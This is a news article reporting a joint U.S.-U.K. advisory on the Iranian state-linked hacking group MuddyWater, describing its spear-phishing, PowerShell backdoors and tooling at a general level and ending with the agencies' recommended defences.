Posted on February 27, 2022 at 4:23 AM
Cybersecurity agencies in the U.S and U.K have revealed that Iranian government-sponsored threat actors are targeting commercial and government networks around the world.
The advisory was issued by the U.K’s National Cyber Security Center (NCSC) and the U.S. Cybersecurity and Infrastructure Security Agency (CISA).
According to the joint advisory, the advanced persistent (APT) group is delivering malware called MuddyWater to give the Iranian government access to stolen data. They also share the solen information with other malicious threat actors.
The threat actors were discovered this year while they were carrying out malicious operations as part of Iran’s Ministry of Intelligence (MOIS). They are set up to target a host of government institutions and top organizations in different regions in the world, especially in the United States and Europe. These organizations are from different institutions and industries, including the defense, telecommunications, and natural gas sectors.
The wider security network has also tracked MuddyWater, which has been given different names such as Seedworm, Static Kitten, TEMP. Zagros, MERCURY, and Earth Vetala. The group is notorious for organizing cyber crimes and launching online attacks since 2018 to achieve the MOIS objectives. It’s not clear how many organizations have been affected since the new malware became active in the wild.
The APT Group Utilizes Different Open-Source Tools
Apart from exploiting the publicly reported vulnerabilities, the APT group also uses open-source tools to have unauthorized access to data by deploying ransomware.
During an investigation by Cisco Talos, the security firm discovered that the threat group has previously carried out a malware campaign that targeted Turkish government institutions and private organizations aiming to deploy a PowerShell-based backdoor.
Additionally, the recent malware activity the U.S and U.K security agencies uncovered follow a similar approach to the previous malware campaign by the same group of actors. They utilize obfuscated PowerShell scripts to hide their attack, which could remain undetected for a long time, including the command and control (C2) functions.
The Hackers Use Spear-Phishing Campaigns
The observation of the threat action noted that they are being facilitated by a spear-phishing campaign that tries to deceive its targets to download malware-infested Zip files. These files either contain a PDF that delivers a malicious payload to the target system or contains an excel file that contains a malicious macro.
Also, the agencies observed that the APT group utilizes different malware sets to make their campaign more potent. So, if one malware set is discovered by the security software, other malware sets will continue with operations.
These sets include POWERSTATS, Mori, Small Sieve, and PowGoop for exfiltration, providing backdoor access, and loading malware.
While a small sieve is a Python-based implant used for staying longer in a network, PowGroup is a loader that downloads second-stage PowerShell scripts.
Both are used by the threat actors to stay longer in the affected system and avoid detection. With the design and level of sophistication the malware sets have, it is usually very difficult for security software to spot infringements. That’s because they generally use the Telegram API for C2 communications to evade detection.
The APT Group Shows A High Level Of Sophistication
The APT group also uses other malware pieces. These include a Windows Script File (.WSF) for collecting and transmitting system metadata to an adversary-controlled IP address.
The POWERSTATS and Mori are two backdoors that are utilized by the actors when running commands received from the C2 to maintain access in the affected system.
MuddyWatter also uses other arsenals of tools to make sure they remain persistent within the affected devices or systems for as long as possible. The agencies observed that the group utilize a survey script for transmitting information about the computer of the victims. The detail is delivered to the C2 server, where the threat actor can take further action on attacking methods.
A newly identified PowerShell backdoor is also deployed, which is used by the actors to execute commands.
Organizations Should Implement Security Measures
The agencies have recommended how organizations can protect their systems and avoid being victims of this new wave of attack.
They recommended that multi-factor authentication should be used whenever applicable. This will create difficulties for potential attacks. Additionally, organizations should minimize the use of administrative privileges while ensuring that they always patch known exploited vulnerabilities as soon as possible. Implementation of phishing protections has been known to also help to keep threat actors away, the security agencies advised.